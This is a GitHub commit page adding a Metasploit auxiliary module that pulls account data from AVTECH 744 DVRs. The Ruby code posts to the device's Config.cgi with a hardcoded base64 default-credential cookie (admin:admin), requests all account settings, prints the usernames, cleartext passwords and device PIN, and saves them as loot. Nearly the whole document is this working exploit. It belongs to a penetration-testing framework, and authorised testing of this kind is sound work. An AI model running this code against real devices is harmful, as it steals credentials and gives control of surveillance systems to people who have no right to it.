Skip to content

Commit 9430d38

Browse files
nstarkenstarke
committed
Adding AVTECH744_DVR Module
This module retrieves account information from an AVTECH 744 DVR, including username, cleartext password, account role, and the device PIN.
1 parent 5fce00f commit 9430d38

File tree

1 file changed

+52
-0
lines changed

1 file changed

+52
-0
lines changed

modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb

Lines changed: 52 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,52 @@
1+
require 'msf/core'
2+
3+
class Metasploit3 < Msf::Auxiliary
4+
5+
include Msf::Exploit::Remote::HttpClient
6+
7+
def initialize(info = {})
8+
super(update_info(info,
9+
'Name' => 'AVTECH 744 DVR Account Information Retrieval',
10+
'Description' => %q{
11+
This module will extract the account information from the DVR,
12+
including all user's usernames and cleartext passwords plus
13+
the device PIN, along with a few other miscellaneous details.
14+
},
15+
'Author' => [ 'nstarke' ],
16+
'License' => MSF_LICENSE
17+
))
18+
19+
register_options(
20+
[
21+
Opt::RPORT(80),
22+
], self.class)
23+
end
24+
25+
26+
def run
27+
res = send_request_cgi({
28+
'method' => 'POST',
29+
'uri' => '/cgi-bin/user/Config.cgi',
30+
'cookie' => 'SSID=YWRtaW46YWRtaW4=;',
31+
'vars_post' => {
32+
'action' => 'get',
33+
'category' => 'Account.*'
34+
}
35+
})
36+
37+
if (res != nil)
38+
res.body.each_line { |line|
39+
split = line.split('=')
40+
key = split[0]
41+
value = split[1]
42+
if (key && value)
43+
print_good("#{key} - #{value}")
44+
end
45+
}
46+
p = store_loot('avtech744.dvr.accounts', 'text/plain', rhost, res.body)
47+
print_good("avtech744.dvr.accounts stored in #{p}")
48+
else
49+
print_error("Unable to receive a response")
50+
end
51+
end
52+
end

0 commit comments

Comments
 (0)